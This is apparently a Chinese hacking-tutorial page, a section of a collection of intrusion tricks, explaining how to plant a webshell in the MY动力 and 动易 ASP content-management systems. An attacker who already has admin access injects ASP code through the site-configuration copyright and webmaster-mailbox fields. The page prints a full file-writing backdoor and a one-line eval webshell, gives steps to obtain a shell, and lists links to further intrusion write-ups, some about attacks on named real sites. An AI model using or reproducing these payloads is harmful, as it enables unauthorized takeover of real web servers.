|
[图文]几个用过的经典入侵技巧整理
二、网站配置文件插马
MY动力管理系统相信很多朋友都玩过吧?但是他的后台可是有点BT。虽然有数据库备份但是并不支持自定义路径,而且数据库里还有<% loop <% 不能闭和,所以数据库备份几乎是没什么用了。不过以前有朋友提出可以先恢复再备份的方法,不过我没测试成功。
这里教大家的方法就是配置文件插马,至于怎么进到后台我就不说,是注射也好,下载默认数据库也好总之能进后台就OK了。进到后台后我们会发现在常规设置,那里有个网站信息配置,点开他,如图4。
图4
我们看到版权信息那里写着 "版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" ,这是系统自带的,因为这里没有限制我们输入的字符长度所以我们就可以在这里传一个类似小马的东西。注意是类似,而不是小马(编辑点评:其实就是个小马。),直接在版权信息那里进行替换,前面要加上他原有的语句,替换代码如下:
| 以下是引用片段: ★ 版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" '版权信息 if Request("xiaoxin")="520" then dim allen,creat,text,thisline,path if Request("creat")="yes" then Set fs = CreateObject("Scripting.FileSystemObject") Set outfile=fs.CreateTextFile(server.mappath(Request("path"))) outfile.WriteLine Request("text") Response.write "小新恭喜" end if Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes'>" Response.write "<textarea name='text'>"&thisline&"</textarea><br>" Response.write "<input type='text' name='path' value='"&Request("path")&"'>" Response.write "<input name='submit' type='submit' value='ok' ></form>" Response.end end if %> ★ |
然后保存一下,千万注意,这个时候,千万别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?xiaoxin=520,有人会问为什么了?因为在上边版权信息内的代码,是一段发送程序,利用 inc/config.asp相关文件信息所写。
进入这个页面之后会发现:这是啥玩意? 好象一个小马。那你就当小马用好了,上面写你的ASP木马代码,下面写上路径,如图5、6。
图5
图6
怎么样?SHELL拿到了吧,这里有一点要注意,虽然SHELL是拿到了但是这个时候网站也挂掉了,我们需要进到SHELL里找到config.asp文件,把里面的 "小新恭喜" 去掉,就OK啦。
其实不光是MY动力管理系统,动易文章系统以前也存在这个问题:在站长信箱那里写入
| 以下是引用片段: "%><%eval(request("xiaozhi"))%><%' |
然后直接连接
inc目录下的config.asp就可以了。因为很多网站信息都是写入在config.asp里的,有空各位朋友可以自己去测试一下(编辑:如果读者朋友懂ASP可以自己研究一些ASP程序是否在后台配置文件用到FSO,这样基本上就是把配置信息写到了ASP文件里了)。
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
| BBSXP2008存在后台注射漏洞 | 02-19 |
| Discuz! 6 后台拿Shell的方法 | 02-17 |
您现在的位置: